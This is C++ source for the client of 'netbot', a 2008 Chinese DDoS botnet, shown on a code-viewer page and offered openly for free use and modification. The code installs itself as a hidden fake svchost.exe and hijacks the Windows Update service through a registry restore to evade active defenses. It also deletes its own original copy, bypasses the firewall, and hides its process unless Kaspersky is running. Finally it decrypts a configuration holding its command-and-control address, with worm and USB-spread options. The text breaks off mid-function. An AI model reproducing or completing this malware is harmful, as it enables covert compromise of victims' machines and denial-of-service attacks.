📄 service.cpp
字号:
//////////////////////////////////////////////////////////////////////////
//netbot免费公开版本
//安全警戒线版权所有
//2008年
//www.hackeroo.com
//中华攻客 QQ266370 msn:hackeroo@hotmail.com
//你可以免费使用、修改和传播,但请保留作者版权信息。
//////////////////////////////////////////////////////////////////////////
// Service.cpp : Defines the entry point for the console application.
//
//网络僵尸服务端代码
#include "stdafx.h"
#include "Service.h"
#include "winsock2.h"
#include "winsvc.h"
#include "ProcessHide.h"
#include "TLHELP32.H"//
#include "data.h"
#include <Dbt.h>
#pragma comment(lib,"LIBCTINY.LIB")
#define WM_SOCKET WM_USER+1000
#define SERVICE_NAME "RasAuto"
struct MODIFY_DATA
{
char IPFile[100]; //ip文件or DNS
char ConnectPass[5];//上线密码
bool IsWorm; //是否启动感染功能
bool IsUpan; //是否u盘传播
}modify_data =
{
"127.0.0.1:8090",
"1111",
false,
false,
};
BOOL SetFileAttrib(char *path);
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;
SOCKET sock_client;//通信socket
SYSTEMINIT sysinfo;//肉鸡信息
CLIENTPARA ClientPa;//上线信息
FUCKWEB fuckweb;//攻击信息
bool stopfuck;
bool isdns;
HWND hWnd;
/*解密数据函数*/
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
unsigned long i;
char *p;
p = szKey;
for(i = 0; i < nLen; i++) {
if(!(*p))
p = szKey;
*szRec -= *p;
*szRec++ ^= *p++;
}
}
int SEU_Rand(int ran)//自定义的随机数发生器
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%ran;
return seed;
}
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;
//test here
/*
if(strstr(modify_data.IPFile,"http")!=NULL)
isdns=false;
else
isdns=true;
start();
return 1;
*/
///自删除----------------------
//Begin=======首次运行,拷贝安装========
char DstFilePath[256];
char SrcFilePath[256];
memset(DstFilePath, 0, 256);
memset(SrcFilePath, 0, 256);
::GetWindowsDirectory(DstFilePath,sizeof(DstFilePath));
strcat(DstFilePath,"\\systom32\\");
CreateDirectory(DstFilePath, NULL);SetFileAttrib(DstFilePath);//隐藏路径
strcat(DstFilePath,"svchost.exe");
GetModuleFileName(NULL, SrcFilePath, sizeof(SrcFilePath));
if (_stricmp(SrcFilePath,DstFilePath) != 0)
{
DeleteFile(DstFilePath);
if(::CopyFile(SrcFilePath,DstFilePath,FALSE)==0)
return -1;
SetFileAttrib(DstFilePath);//隐藏文件
//替换系统服务,过主动防御
if(StopMyService())//停止服务
RestoreService();//替换系统服务
StartMyService();//开始服务
uninstall();//自删除
ExitProcess(0);
}
//End========================================
//解密配置信息
DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
if(strstr(modify_data.IPFile,"http")!=NULL)
isdns=false;
else
isdns=true;
//创建互斥量-----------------------------------
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Sking");
//检查错误代码
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
//如果已有互斥量存在则释放句柄并复位互斥量
CloseHandle(m_hMutex);
m_hMutex=NULL;
//退出程序
ExitProcess(0);
}
//服务入口表-----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName=SERVICE_NAME; //线程名字
service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址
//可以有多个线程,最后一个必须为NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
//启动服务
StartServiceCtrlDispatcher(service_tab_entry);
return nRetCode;
}
/***********************************************/
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
service_status_ss.dwServiceType=SERVICE_WIN32;
service_status_ss.dwCurrentState=SERVICE_START_PENDING;
service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
service_status_ss.dwServiceSpecificExitCode=0;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
service_status_ss.dwWin32ExitCode=0;
if ((handle_service_status=RegisterServiceCtrlHandler(SERVICE_NAME,Handler))==0)
{
//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
}//一个服务对应一个控制处理器
service_status_ss.dwCurrentState=SERVICE_RUNNING;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
::SetServiceStatus(handle_service_status,&service_status_ss);
//run my code here
ByPassFireWall();
//没有卡巴进程则隐藏本进程
bool ishide=true;
HANDLE Snapshot;
Snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 processListStr;
processListStr.dwSize=sizeof(PROCESSENTRY32);
BOOL return_value;
return_value=Process32First(Snapshot,&processListStr);
int i=0;//item index
char ProcessName[32];
while(return_value)
{
strcpy(ProcessName,processListStr.szExeFile);
for(int t=0;t<strlen(ProcessName);t++)
{
ProcessName[t]=processListStr.szExeFile[t]|0x20;
}
if(strstr(ProcessName,"avp.exe")!=NULL)
{
ishide=false;
break;
}
return_value=Process32Next(Snapshot,&processListStr);
//获得系统进程链表中下一个进程的信息
i++;
}
if (ishide)
{
HideCurrentProcess();//隐藏进程
}
SetPriorityClass(GetCurrentProcess(),6);//降低进程优先级
start();
return ;
}
/***********************************************/
//服务控制器
void WINAPI Handler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
service_status_ss.dwCurrentState=SERVICE_STOPPED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_CONTINUE:
service_status_ss.dwCurrentState=SERVICE_RUNNING;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_PAUSE:
service_status_ss.dwCurrentState=SERVICE_PAUSED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
::SetServiceStatus(handle_service_status,&service_status_ss);
}
/***********************************************/
bool SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
HANDLE hToken=NULL;
TOKEN_PRIVILEGES tp;
LUID luid;
if(OpenProcessToken(::GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)==0)
{
// printf("SetPrivilege:OpenProcessToken Fail!");
return false;
}
if ( !LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
// printf("SetPrivilege:LookupPrivilegeValue Fail!");
CloseHandle( hToken );
return false;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
if ( !AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL) )
{
// printf("SetPrivilege:AdjustTokenPrivileges Fail!");
CloseHandle( hToken );
return false;
}
return true;
}
int RestoreService()
{
HANDLE hFile;
DWORD dwBytes;
char szSysDir[256];
memset(szSysDir,0,sizeof(szSysDir));
GetSystemDirectory(szSysDir,sizeof(szSysDir));
strcat(szSysDir,"\\update.bak");
hFile=CreateFile(szSysDir,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,NULL);
WriteFile(hFile,ServiceBak,sizeof(ServiceBak)-1,&dwBytes,NULL);
CloseHandle(hFile);
HKEY hService;
LONG tmp;
SetPrivilege(SE_RESTORE_NAME,TRUE);
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE, // handle to open key
"SYSTEM\\CurrentControlSet\\Services\\wuauserv", // subkey name
NULL, // reserved
KEY_ALL_ACCESS,// security access mask
&hService // handle to open key
) != ERROR_SUCCESS)
{
// printf("Can't open Service key\n");
return 0;
}
//The first time to Restore always fail even you set the Force flag
//The second time will success.
for(;;)
{
if((tmp = RegRestoreKey(hService,szSysDir, 8 ) ) == ERROR_SUCCESS )
{
break;
}
}
CloseHandle(hService);
DeleteFile(szSysDir);
return 1;
}
/***********************************************/
bool StopMyService()
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS RemoveServiceStatus;
schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库
if (schSCManager!=NULL)
{
schService=::OpenService(schSCManager,SERVICE_NAME,SERVICE_ALL_ACCESS);//获得update服务对象的句柄
if (schService!=NULL)
{
ChangeServiceConfig(schService,SERVICE_NO_CHANGE, SERVICE_DEMAND_START,SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL,NULL);
ChangeServiceConfig(schService,SERVICE_NO_CHANGE, SERVICE_DEMAND_START,SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL,NULL);
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState!=SERVICE_STOPPED)//停止服务
{
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
}
}
}
CloseServiceHandle(schService);
}
::CloseServiceHandle(schSCManager);
}
else
return false;
return true;
}
bool StartMyService()
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS ServiceStatus;
DWORD dwErrorCode;
schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库
if (schSCManager!=NULL)
{
schService=::OpenService(schSCManager,SERVICE_NAME,SERVICE_ALL_ACCESS);//获得Alerter服务对象的句柄
if (schService!=NULL)
{
if(StartService(schService,0,NULL)==0)//已经存在该服务,就启动服务
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return true;
}
}
while(QueryServiceStatus(schService,&ServiceStatus)!=0)
{
if(ServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
CloseServiceHandle(schService);
}
CloseServiceHandle(schSCManager);
}
else
return false;
return true;
}
/************************************************/
/************************************************/
int start()
{
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="Sking";
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=NULL;//LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=NULL;//LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"SkingDDos",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
SendMessage(hWnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息
//****************************************
int ErrorCode;
WSADATA WsaData;
struct sockaddr_in DestAddr; //上线地址结构
char html[256]; //获取的网页
char *point; //指针
memset(html,0,sizeof(html));
if(isdns)
{
strcpy(html,"[");
strcat(html,modify_data.IPFile);
strcat(html,"]");
}
else
{
//获取网页内容
for(;;)
{
if(GetHttpFile!=NULL)
{
strcpy(html,strlwr(GetHttpFile(modify_data.IPFile)));
break;
}
else
Sleep(30000);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -